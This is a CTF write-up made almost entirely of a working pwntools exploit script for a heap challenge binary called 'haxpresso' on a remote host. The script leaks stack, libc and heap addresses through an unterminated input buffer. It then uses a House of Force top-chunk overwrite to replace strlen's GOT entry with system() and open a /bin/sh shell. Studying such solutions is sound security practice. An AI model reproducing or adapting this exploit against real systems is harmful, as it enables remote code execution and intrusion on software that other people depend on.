Rating:
Vuln: Input is not null-terminated, so stack data (containing addresses) is copied to the heap along with the input and later leaks. Followed by House of Force.
Script:
```
from pwn import *
# Verbose pwntools logging; gdb (when attached) opens in a horizontal tmux split.
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'])
# Local-run alternative, kept disabled in favour of the remote instance below.
#p = process('haxpresso')
p = remote('52.30.206.11', 1337)
b = ELF('./haxpresso')  # challenge binary (presumably 32-bit, given the u32/p32 use later)
l = ELF('./libc.so')    # libc shipped with the challenge, used for the system() offset
# Debugger hook, disabled; re-enable together with the local process() line above.
"""
gdb.attach(p, '''
b *0x8048dfd
''')
"""
def add_order(drink, add_name='n', name=""):
    """Drive menu option 1 ("add order").

    drink    -- drink id, sent as a line after the 'drink: ' prompt.
    add_name -- answer to the "(y/n)" question; only 'y' makes the program ask for a name.
    name     -- sent with p.send() (no trailing newline) when add_name == 'y'.
    Returns everything received up to the next "> " prompt.
    """
    p.sendline('1')
    for marker, reply in (('drink: ', str(drink)), ("(y/n): ", add_name)):
        p.recvuntil(marker)
        p.sendline(reply)
    if add_name == 'y':
        p.recvuntil("name: ")
        p.send(name)  # raw send: the bytes go out exactly as given
    return p.recvuntil("> ")
def edit_order(idx, name):
    """Drive menu option 4 ("edit order").

    idx  -- order index, sent as a line after the 'edit: ' prompt.
    name -- replacement content, sent raw (no newline) after the 'order: ' prompt.
    Returns everything received up to the next "> " prompt.
    """
    steps = (('edit: ', str(idx), p.sendline),
             ('order: ', name, p.send))
    p.sendline('4')
    for marker, value, write in steps:
        p.recvuntil(marker)
        write(value)
    return p.recvuntil("> ")
def rem_order(idx):
    """Drive menu option 2 ("remove order") for order *idx*.

    Returns everything received up to the next "> " prompt.
    Not called anywhere in this script; kept as part of the menu wrapper set.
    """
    selection = str(idx)
    p.sendline('2')
    p.recvuntil('remove: ')
    p.sendline(selection)
    output = p.recvuntil("> ")
    return output
def checkout(idx, new, finish_yn, change_yn='n'):
    """Drive menu option 3 ("checkout") and return output collected up to the next "> " prompt.

    Two dialogue shapes are handled:
      new=True  -- the program asks for an order id, then a finish "(y/n)" question.
      new=False -- the program first asks a "(y/n)" question, answered with change_yn;
                   'y' leads to an id prompt, anything else to the finish "(y/n)" question.
    Only in the new=False case is the text received up to the first "(y/n)" prompt
    included in the return value; that is the text the leak parsing below relies on.

    NOTE(review): indentation was lost in the pasted script; the nesting here is
    reconstructed from the call sites (checkout(0, False, 'y') must return the
    first prompt's output), so confirm it against the original file.
    """
    p.sendline('3')
    o = ""
    if not new:
        # Existing checkout: capture the prompt text, it carries the echoed order.
        o = p.recvuntil('(y/n): ')
        p.sendline(change_yn)
        if change_yn=='y':
            p.recvuntil('id: ')
            p.sendline(str(idx))
        else:
            p.recvuntil('(y/n): ')
            p.sendline(finish_yn)
        o+=p.recvuntil('> ')
        return o
    # Fresh checkout: id prompt first, then the finish question.
    p.recvuntil('id: ')
    p.sendline(str(idx))
    p.recvuntil('(y/n): ')
    p.sendline(finish_yn)
    o+=p.recvuntil('> ')
    return o
def update_firmware(size, data, note):
    """Drive menu option 0 ("update firmware") and then hand the session to the user.

    size -- sent as a line after the 'size: ' prompt.
    data -- sent raw (no newline) after the 'data: ' prompt.
    note -- sent raw (no newline) after the 'note: ' prompt.
    Ends with p.interactive(), so it does not return until the session is closed.
    """
    replies = (('size: ', str(size), p.sendline),
               ('data: ', data, p.send),
               ('note: ', note, p.send))
    p.sendline('0')
    for marker, value, write in replies:
        p.recvuntil(marker)
        write(value)
    p.interactive()
# --- Stage 1: leak a stack and a libc address via the unterminated name (see Vuln note) ---
add_order(1, add_name='y', name="A") #0
checkout(0, True, 'n')
# Line 5 of the checkout output echoes the name followed by the bytes copied after
# it; stripping the "Name: A" prefix leaves only the leaked bytes.
leak = checkout(0, False, 'y').split('\n')[4].replace('Name: A', '')
stackaddr = u32(leak[7:11])
log.info("Stack addr: " + hex(stackaddr))
# Only three bytes of the libc pointer are recovered; a 0x00 low byte is
# re-added before unpacking (little-endian).
libcaddr = u32("\x00" + leak[0:3])
# Distance from the leaked pointer to the libc base, hard-coded for the target's
# libc.so build. NOTE(review): this constant, not the leak, is what breaks on a
# different libc build -- verify against l.symbols if the remote libc changes.
libcbase = libcaddr + (0xf7de9000-0xf7df6600)
log.info("Libc addr: " + hex(libcaddr))  # logs the raw leak; the base is logged further down
# --- Stage 2: heap layout preparation and a heap-address leak ---
add_order(1, add_name='y', name="\n"*72+ "\x00") #1
payload = ""
payload += "\x00"*(72-len(payload))  # 72 NUL bytes
edit_order(1, payload)
add_order(1, add_name='y', name="BBBB\x00") #2
add_order(1, add_name='y', name="CCCC\x00") #3
edit_order(2, "X"*28)  # 28 bytes, no terminator: the 4 bytes after the name print with it
checkout(2, True, 'n')
heapaddr = u32(checkout(2,False,'n').split('\n')[4].replace("Name: " + "X"*28, '')[0:4])
log.info("Heap addr: " + hex(heapaddr))
top = heapaddr + 0x8  # presumably the top chunk; the +0x8 is specific to this heap layout
# Stack and heap addresses were already logged above; these repeats are redundant.
log.info("Stack addr: " + hex(stackaddr))
log.info("Heap addr: " + hex(heapaddr))
log.info("Libc addr: " + hex(libcbase))
log.info("Top: " + hex(top))
# --- Stage 3: House of Force (per the Vuln note) ---
# Writes 0xffffffff at offset 52 of order #2's buffer -- presumably the top chunk's
# size field. Mitigation: glibc >= 2.29 validates the top chunk size in sysmalloc
# ("malloc(): corrupted top size"), which stops this step on current libcs.
edit_order(2, "X"*52 + p32(0xffffffff))
victim = b.symbols.got['strlen']-0x8  # target just below strlen's GOT entry
offset = victim - top -0x8            # allocation size chosen so the next chunk lands on victim
got = p32(libcbase + l.symbols['system'])  # value that will overwrite the GOT entry
update_firmware(offset, "/bin/sh\x00", got)
# update_firmware() already calls p.interactive(); this second call is redundant
# and only runs after the first interactive session ends.
p.interactive()
```